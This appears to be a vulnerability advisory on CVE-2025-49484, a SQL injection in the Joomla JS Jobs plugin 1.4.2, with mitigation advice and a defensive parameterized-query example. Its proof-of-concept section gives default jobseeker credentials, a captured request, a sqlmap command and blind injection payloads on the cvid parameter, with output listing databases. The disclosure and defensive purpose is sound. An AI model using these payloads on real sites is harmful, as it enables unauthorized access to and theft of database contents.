Joomla JS Jobs Plugin Vulnerability: CVE-2025-49484
The Joomla JS Jobs plugin version 1.4.2 has been identified as having a critical SQL injection vulnerability, cataloged as CVE-2025-49484. This vulnerability allows attackers to manipulate SQL queries by injecting malicious SQL code through user inputs, potentially leading to unauthorized access to sensitive data.
Technical Details
This SQL injection vulnerability arises from inadequate input validation within the JS Jobs plugin. Specifically, the flaw exists in the handling of parameters passed to SQL queries. When a user inputs data into a form that interacts with the database, the plugin fails to properly sanitize this input. As a result, an attacker can craft a specially formed input that alters the intended SQL query. For example, an attacker might input ' OR '1'='1 into a search field, which could allow them to bypass authentication mechanisms and retrieve sensitive information from the database.
Impact
The potential consequences of exploiting this vulnerability are severe. Attackers can gain access to confidential user data, including usernames, passwords, and personal information. Furthermore, they could modify or delete database records, leading to data integrity issues and potentially crippling business operations. Organizations utilizing this plugin are at heightened risk of data breaches and compliance violations, which could result in significant financial and reputational damage.
Mitigation
To protect against CVE-2025-49484, it is crucial for organizations to upgrade to the latest version of the JS Jobs plugin, where this vulnerability has been addressed. Regularly updating all plugins and components within Joomla is a best practice that helps mitigate known vulnerabilities. Additionally, security professionals should implement web application firewalls (WAFs) to filter out malicious SQL queries before they reach the server.
Furthermore, conducting routine security assessments and penetration testing can help identify and remediate vulnerabilities before they are exploited. Educating developers about secure coding practices, including proper input validation and parameterized queries, is essential to prevent future vulnerabilities of this nature.
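The difference between a concatenated query and the parameterized, validated form recommended above can be shown with the boolean-based `cvid` value reported in the proof of concept on this page. This is an added example, not the plugin's code: the `resumes` table, the function names, and the use of SQLite in place of MySQL are assumptions made so that it runs offline.

```python
import sqlite3

# Boolean-based cvid value copied from the sqlmap output on this page.
PAGE_PAYLOAD = ("(SELECT (CASE WHEN (7270=7270) THEN 1 "
                "ELSE (SELECT 6098 UNION SELECT 7386) END))")

def make_db():
    """Constructed stand-in table; the schema and names are hypothetical."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE resumes (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO resumes VALUES (?, ?)",
                   [(1, "jobseeker CV"), (2, "second CV")])
    return db

def lookup_concatenated(db, cvid):
    """Vulnerable pattern: cvid is pasted into a numeric context, so the
    input needs no quote character and quote-escaping would not stop it."""
    return db.execute("SELECT id, title FROM resumes WHERE id = " + cvid).fetchall()

def lookup_bound(db, cvid):
    """Bound parameter: the value travels as data and is never parsed as SQL."""
    return db.execute("SELECT id, title FROM resumes WHERE id = ?", (cvid,)).fetchall()

def parse_id(raw):
    """Allow-list validation: ASCII digits only, bounded length."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 10):
        raise ValueError("cvid must be a non-negative integer")
    return int(raw)

def lookup_hardened(db, raw_cvid):
    """Validate first, then bind: two independent layers."""
    return lookup_bound(db, parse_id(raw_cvid))

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", lookup_concatenated(db, PAGE_PAYLOAD))  # expression was executed
    print("bound:       ", lookup_bound(db, PAGE_PAYLOAD))         # compared as a string
    print("hardened '1':", lookup_hardened(db, "1"))
    try:
        lookup_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened payload rejected:", exc)
```

The concatenated lookup returns row 1 because the database evaluated the submitted expression; the bound lookup returns nothing for the same input, and the validated path rejects it before any query is issued.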
Proof of Concept (PoC)
# Exploit Title: Joomla JS Jobs plugin 1.4.2 - SQL injection
# Google Dork: n/a
# Date: 07/07/2025
# Exploit Author: Adam Wallwork
# Vendor Homepage: https://joomsky.com/
# Demo: https://demo.joomsky.com/js-jobs/jm/free/
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Version: v1.4.2
# Tested on: v1.4.2
An SQL injection vulnerability exists in the JS Jobs extension (v1.4.2) via the 'cvid' parameter and is exploitable as the jobseeker user.
To exploit this vulnerability, log in as the jobseeker user with default credentials (jobseeker:demo) and go to 'jobseeker-controlpanel >> My Stuff >> Newest Jobs >> Newest Jobs >> Apply Now >> Apply Now' and capture the "Apply Now" request (req.txt).
HTTP Request:
```
POST /index.php?option=com_jsjobs&task=jobapply.jobapplyajax HTTP/2
Host: localhost:8080
Cookie: joomla_user_state=logged_in; 67aa5f9b49e233456b916ea62ef1447b=kjou43pssdvaa5plr84dhc8P64
Content-Length: 38
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/index.php/component/jsjobs/newest-jobs?Itemid=
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

jobid=1&cvid=1&coverletterid=4&uid=460
```
Exploit:
```
sqlmap -r req.txt --dbs --batch -p cvid --dbms=mysql --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.1.2#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

---
Parameter: cvid (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: jobid=1&cvid=(SELECT (CASE WHEN (7270=7270) THEN 1 ELSE (SELECT 6098 UNION SELECT 7386) END))&coverletterid=4&uid=460

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: jobid=1&cvid=1 AND (SELECT 6497 FROM (SELECT(SLEEP(5)))EAyv)&coverletterid=4&uid=460
---
available databases [2]:
[*] joomla_db
[*] information_schema
```